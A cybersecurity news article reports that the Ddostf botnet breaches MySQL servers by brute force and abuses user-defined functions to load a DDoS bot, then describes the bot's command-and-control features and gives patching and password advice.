The 'Ddostf' malware botnet is actively focusing on MySQL servers, aiming to hijack them for a DDoS-as-a-Service platform that rents its firepower to fellow cybercriminals. As per cybersecurity researchers' findings, the operators of Ddostf exploit vulnerabilities in MySQL environments that haven't been patched or employ brute-force attacks on weak administrator account credentials to compromise the targeted servers.
The Hackers Behind the Ddostf Botnet Exploit Legitimate Functions
Cyber attackers are actively scanning the Internet for exposed MySQL servers and, upon identification, employ brute-force techniques to breach them. In the case of Windows MySQL servers, threat actors utilize a feature known as user-defined functions (UDFs) to execute commands on the compromised system.
UDF is a MySQL feature that enables users to define functions in C or C++, compiling them into a DLL (dynamic link library) file to extend the database server's capabilities. In this scenario, attackers craft their own UDFs and register them with the database server, naming the DLL file 'amd.dll' and incorporating malicious functions, including:
- Downloading payloads such as the Ddostf DDoS bot from a remote server.
- Executing arbitrary system-level commands sent by the attackers.
- Capturing the results of command execution, storing them in a temporary file, and sending them back to the attackers.
Exploiting UDFs serves as a mechanism for loading the primary payload of the attack—the Ddostf bot client. However, this abuse of UDFs also opens the door to potential installation of other malware, data exfiltration, establishment of backdoors for persistent access, and various other malicious activities.
The Ddostf Botnet can Connect to New Command-and-Control (C2) Addresses
Originating from China, Ddostf is a malware botnet that emerged around seven years ago, targeting both Linux and Windows systems.
Upon infiltrating Windows systems, the malware ensures persistence by registering itself as a system service during its initial execution. Subsequently, it decrypts its Command-and-Control (C2) configuration to establish a connection. The malware then gathers information about the host system, including CPU frequency, core count, language details, Windows version, network speed, and more. This data is transmitted to the C2 server.
The C2 server has the capability to issue various commands to the botnet client, ranging from DDoS attack instructions (such as SYN Flood, UDP Flood, and HTTP GET/POST Flood attacks) to requests for discontinuing the transmission of system status information, changing to a new C2 address, or downloading and executing a new payload. Ddostf's unique feature lies in its ability to connect to a new C2 address, providing it with resilience against takedown attempts—setting it apart from the majority of the DDoS botnet malware.
In light of these developments, cybersecurity experts recommend that MySQL administrators stay vigilant by applying the latest updates and implementing robust security measures, such as using long and unique passwords. This helps safeguard admin accounts from potential brute force and dictionary attacks.